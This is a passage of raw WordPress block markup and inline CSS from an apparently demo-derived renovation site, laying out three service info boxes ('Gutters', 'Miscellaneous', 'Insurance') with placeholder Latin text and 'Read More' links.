0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section 